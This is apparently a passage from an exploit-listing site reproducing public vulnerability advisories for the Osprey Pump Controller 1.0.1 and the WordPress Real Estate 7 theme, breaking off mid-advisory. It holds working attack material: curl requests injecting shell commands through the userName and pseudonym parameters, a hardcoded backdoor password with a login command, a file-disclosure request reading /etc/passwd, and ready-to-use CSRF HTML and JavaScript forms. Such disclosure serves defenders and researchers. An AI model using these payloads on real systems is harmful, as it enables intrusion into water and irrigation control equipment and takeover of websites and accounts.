Latest exploits :: CodePwn

<pre><code> Osprey Pump Controller 1.0.1 (userName) Blind Command Injection Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The pump controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'userName' HTTP POST parameter called by index.php script. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5749 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5749.php 05.01.2023 -- $ curl -s http://TARGET/index.php --data="userName=;sleep%2017&pseudonym=251" HTTP/1.1 200 OK </code></pre>

<pre><code> Osprey Pump Controller 1.0.1 (pseudonym) Semi-blind Command Injection Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The pump controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pseudonym' HTTP POST parameter called by index.php script. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5748 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5748.php 05.01.2023 -- $ curl -s http://TARGET/index.php --data="userName=thricer&pseudonym=%3Bpwd" HTTP/1.1 200 OK $ sleep 3 $ #Reflected URL Address Bar: http://TARGET/index.php?userName=thricer&sessionCode=/var/www/html </code></pre>

<pre><code>==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] == Report Title: WordPress Real Estate 7 Theme <= 3.3.4 - Multiple Cross-Site Request Forgery (CSRF) Vulnerabilities Google Dork: inurl:/wp-content/themes/realestate-7/ Research Date: 2023-02-10 Researcher: FearZzZz [ https://fearzzzz.ru ] Component Vendor: Contempo Themes [ https://contempothemes.com ] Vulnerable Version: <= 3.3.4 Component Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778 CVSS Base Score: 6.3 (Medium) CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L OWASP Top 10: A01: 2021 – Broken Access Control CWE: CWE-352 CVE: TBA ================================================================================================= #### [ Description: ] The Real Estate 7 theme for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, v3.3.4, because of missing and incorrect nonce validation on several functions. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. #### [ Impact: ] Impact of a CSRF vulnerability is related to the privileges of the target user. Depending on the nature of the action, an attacker might be able to change some data or gain full control over the user's account. If the compromised user has a privileged role (administrator, i.e.) within the application, then the attacker can gain full control over the application. #### [ Proof-of-Concept | Lead Alert Creation: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="ct_email_cron_onoff" /> <input type="hidden" name="esetting" value="onsms" /> <input type="hidden" name="id" value="12" /> <input type="hidden" name="author_id" value="22" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` #### [ Proof-of-Concept | Add Property to Favorites: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/our-properties/our-exclusive-listings/"> <input type="hidden" name="wpfpaction" value="add" /> <input type="hidden" name="postid" value="1005" /> <input type="hidden" name="ajax" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` #### [ Proof-of-Concept | Remove Property from Favorites: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/favorite-listings/"> <input type="hidden" name="wpfpaction" value="remove" /> <input type="hidden" name="page" value="1" /> <input type="hidden" name="postid" value="451" /> <input type="hidden" name="ajax" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` #### [ Proof-of-Concept | Contact / Information Request: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-favorites.php" method="POST"> <input type="hidden" name="ctsubject" value="Fear is Big Business" /> <input type="hidden" name="name" value="FearZzZz" /> <input type="hidden" name="email" value="fearzzzz@tutanota.com" /> <input type="hidden" name="ctphone" value="no" /> <input type="hidden" name="message" value="Fear is Big Business" /> <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" /> <input type="hidden" name="ctproperty" value="https://fearzzzz.ru" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-listings.php" method="POST"> <input type="hidden" name="listing_id" value="451" /> <input type="hidden" name="ctsubject" value="Fear is Big Business" /> <input type="hidden" name="name" value="FearZzZz" /> <input type="hidden" name="email" value="fearzzzz@tutanota.com" /> <input type="hidden" name="ctphone" value="" /> <input type="hidden" name="message" value="Fear is Big Business" /> <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" /> <input type="hidden" name="ctproperty" value="Z" /> <input type="hidden" name="ctlistingstreet" value="Z" /> <input type="hidden" name="ctlistingcity" value="Z" /> <input type="hidden" name="ctlistingstate" value="Z" /> <input type="hidden" name="ctlistingzip" value="Z" /> <input type="hidden" name="ctpermalink" value="https://fearzzzz.ru" /> <input type="hidden" name="ctlistingprice" value="Z" /> <input type="hidden" name="ctlistingsqft" value="Z" /> <input type="hidden" name="ctlistingbeds" value="" /> <input type="hidden" name="ctlistingbaths" value="" /> <input type="hidden" name="ctlistinglotsize" value="" /> <input type="hidden" name="ctlistingmlsnumber" value="" /> <input type="hidden" name="ctlistingpropertytype" value="Detached" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` #### [ Proof-of-Concept | Lead Alert Deletion: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="ct_delete_search" /> <input type="hidden" name="property_id" value="12" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` #### [ Proof-of-Concept | Profile Image Deletion: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="ct_ajax_delete_profile_img" /> <input type="hidden" name="id" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` #### [ Proof-of-Concept | Broker Logo Deletion: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="ct_ajax_delete_broker_logo" /> <input type="hidden" name="id" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` #### [ Proof-of-Concept | Clear All Favorites: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/favorite-listings/"> <input type="hidden" name="wpfpaction" value="clear" /> <input type="hidden" name="ajax" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` #### [ Proof-of-Concept | Buyer Profile Update: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/account-settings/" method="POST" enctype="multipart/form-data"> <input type="hidden" name="first_name" value="" /> <input type="hidden" name="last_name" value="" /> <input type="hidden" name="nickname" value="fearzzzz" /> <input type="hidden" name="display_name" value="FearZzZz" /> <input type="hidden" name="email" value="fearzzzz@tutanota.com" /> <input type="hidden" name="user_url" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="pass1" value="" /> <input type="hidden" name="pass2" value="" /> <input type="hidden" name="twitterhandle" value="" /> <input type="hidden" name="facebookurl" value="" /> <input type="hidden" name="instagramurl" value="" /> <input type="hidden" name="linkedinurl" value="" /> <input type="hidden" name="youtubeurl" value="" /> <input type="hidden" name="mobile" value="" /> <input type="hidden" name="user_additional_phone_1" value="" /> <input type="hidden" name="user_additional_phone_2" value="" /> <input type="hidden" name="user_mailing_address" value="" /> <input type="hidden" name="updateuser" value="Update Profile" /> <input type="hidden" name="_wpnonce" value="0451" /> <input type="hidden" name="_wp_http_referer" value="/account-settings/" /> <input type="hidden" name="action" value="update-user" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` #### [ Proof-of-Concept | Agent Profile Update: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/fearzzzz.ru\/account-settings\/", true); xhr.setRequestHeader("content-type", "multipart\/form-data; boundary=---------------------------333499251812319952534005853646"); xhr.withCredentials = true; var body = "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"first_name\"\r\n" + "\r\n" + "Agent\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"last_name\"\r\n" + "\r\n" + "Demo\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"nickname\"\r\n" + "\r\n" + "agent\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"display_name\"\r\n" + "\r\n" + "Demo Agent\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"email\"\r\n" + "\r\n" + "agent@email.com\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"user_url\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"description\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"pass1\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"pass2\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"twitterhandle\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"facebookurl\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"instagramurl\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"linkedinurl\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"youtubeurl\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + "\r\n" + "1024000\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"ct_profile_img\"; filename=\"fearzzzz.jpg\"\r\n" + "Content-Type: image/jpeg\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"mobile\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"user_additional_phone_1\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"user_additional_phone_2\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"user_mailing_address\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"fax\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"title\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"tagline\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"agentlicense\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + "\r\n" + "1024000\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"ct_broker_logo\"; filename=\"fearzzzz.jpg\"\r\n" + "Content-Type: image/jpeg\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"brokeragename\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"brokeragelicense\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"office\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"address\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"city\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"state\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"postalcode\"\r\n" + "\r\n" + "\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"updateuser\"\r\n" + "\r\n" + "Update Profile\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" + "\r\n" + "0451\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" + "\r\n" + "/account-settings/\r\n" + "-----------------------------333499251812319952534005853646\r\n" + "Content-Disposition: form-data; name=\"action\"\r\n" + "\r\n" + "update-user\r\n" + "-----------------------------333499251812319952534005853646--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> ``` #### [ Timeline: ] 2023.02.08 - Real Estate 7 Theme v3.3.4 released. 2023.02.10 - Vulnerability has been discovered. 2023.02.15 - Vendor notified. 2023.02.16 - Chris Robinson responded that the vulnerabilities have been fixed. The release of the new version v3.3.5 is scheduled for March 6. #### [ Contacts: ] Website: fearzzzz.ru Email: fearzzzz@tutanota.com Twitter: https://twitter.com/fear_zzzz Medium: https://fearzzzz.medium.com GitHub: https://github.com/fearzzzz YouTube: https://youtube.com/@fearzzzz #### [ Notes: ] Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication. #### [ Disclaimer: ] The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages. ========================================================================== [ www.fearzzzz.ru ] == </code></pre>

<pre><code> Osprey Pump Controller 1.0.1 Administrator Backdoor Access Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The controller has a hidden administrative account 'admin' that has the hardcoded password 'Mirage1234' that allows full access to the web management interface configuration. The user admin is not visible in Usernames & Passwords menu list (120) of the application and the password cannot be changed through any normal operation of the device. The backdoor lies in the /home/pi/Mirage/Mirage_ValidateSessionCode.x ELF binary. ---------------------------------------------------------------------- /home/pi/Mirage/Mirage_ValidateSessionCode.x -------------------------------------------- bd = strcmp(userName,"admin"); if (bd == 0) { userpassWord._0_4_ = 0x6172694d; userpassWord._4_4_ = 0x32316567; userpassWord._8_2_ = 0x3433; userpassWord[10] = '\0'; } ---------------------------------------------------------------------- Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5747 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5747.php 05.01.2023 -- $ curl -s http://TARGET/index.php --data="userName=admin&pseudonym=Mirage1234" HTTP/1.1 200 OK $ #Then ** Register Access Menu ** </code></pre>

<pre><code> Osprey Pump Controller 1.0.1 Unauthenticated File Disclosure Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The controller suffers from an unauthenticated file disclosure vulnerability. Using the 'eventFileSelected' GET parameter, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5746 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5746.php 05.01.2023 -- $ curl -s http://TARGET/DataLogView.php?eventFileSelected=/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin ... ... </code></pre>

<pre><code>==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] == Report Title: WordPress Real Estate 7 Theme <= 3.3.4 - Abuse of Functionality Google Dork: inurl:/wp-content/themes/realestate-7/ Research Date: 2023-02-10 Researcher: FearZzZz [ https://fearzzzz.ru ] Component Vendor: Contempo Themes [ https://contempothemes.com ] Vulnerable Version: <= 3.3.4 Component Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778 CVSS Base Score: 7.2 (High) CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L OWASP Top 10: A04: 2021 – Insecure Design CWE: CWE-472 CVE: TBA ================================================================================================= #### [ Description: ] The Real Estate 7 theme for WordPress is vulnerable to Abuse of Functionality via the `ctyouremail` parameter in the `/includes/ajax-submit-favorites.php` and `/includes/ajax-submit-listings.php` files in versions up to, and including, v3.3.4. This makes it possible for unauthenticated attackers to use implemented functions from the vulnerable service to invoke unintended/malicious outcomes. #### [ Impact: ] If a web application doesn't properly protect assumed-immutable values from modification in hidden form fields, parameters, cookies, or URLs, this can lead to modification of critical data. Improper validation of data that are user-controllable can lead to the application processing incorrect, and often malicious, input. #### [ Proof-of-Concept: ] ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-favorites.php" method="POST"> <input type="hidden" name="ctsubject" value="Fear is Big Business" /> <input type="hidden" name="name" value="FearZzZz" /> <input type="hidden" name="email" value="fearzzzz@tutanota.com" /> <input type="hidden" name="ctphone" value="no" /> <input type="hidden" name="message" value="Fear is Big Business" /> <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" /> <input type="hidden" name="ctproperty" value="https://fearzzzz.ru" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-listings.php" method="POST"> <input type="hidden" name="listing_id" value="451" /> <input type="hidden" name="ctsubject" value="Fear is Big Business" /> <input type="hidden" name="name" value="FearZzZz" /> <input type="hidden" name="email" value="fearzzzz@tutanota.com" /> <input type="hidden" name="ctphone" value="" /> <input type="hidden" name="message" value="Fear is Big Business" /> <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" /> <input type="hidden" name="ctproperty" value="Z" /> <input type="hidden" name="ctlistingstreet" value="Z" /> <input type="hidden" name="ctlistingcity" value="Z" /> <input type="hidden" name="ctlistingstate" value="Z" /> <input type="hidden" name="ctlistingzip" value="Z" /> <input type="hidden" name="ctpermalink" value="https://fearzzzz.ru" /> <input type="hidden" name="ctlistingprice" value="Z" /> <input type="hidden" name="ctlistingsqft" value="Z" /> <input type="hidden" name="ctlistingbeds" value="" /> <input type="hidden" name="ctlistingbaths" value="" /> <input type="hidden" name="ctlistinglotsize" value="" /> <input type="hidden" name="ctlistingmlsnumber" value="" /> <input type="hidden" name="ctlistingpropertytype" value="Detached" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` #### [ Timeline: ] 2023.02.08 - Real Estate 7 Theme v3.3.4 released. 2023.02.10 - Vulnerability has been discovered. 2023.02.15 - Vendor notified. 2023.02.16 - Chris Robinson responded that the vulnerabilities have been fixed. The release of the new version v3.3.5 is scheduled for March 6. #### [ Contacts: ] Website: fearzzzz.ru Email: fearzzzz@tutanota.com Twitter: https://twitter.com/fear_zzzz Medium: https://fearzzzz.medium.com GitHub: https://github.com/fearzzzz YouTube: https://youtube.com/@fearzzzz #### [ Notes: ] Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication. #### [ Disclaimer: ] The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages. ========================================================================== [ www.fearzzzz.ru ] == </code></pre>

<pre><code> Osprey Pump Controller 1.0.1 Predictable Session Token / Session Hijack Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows 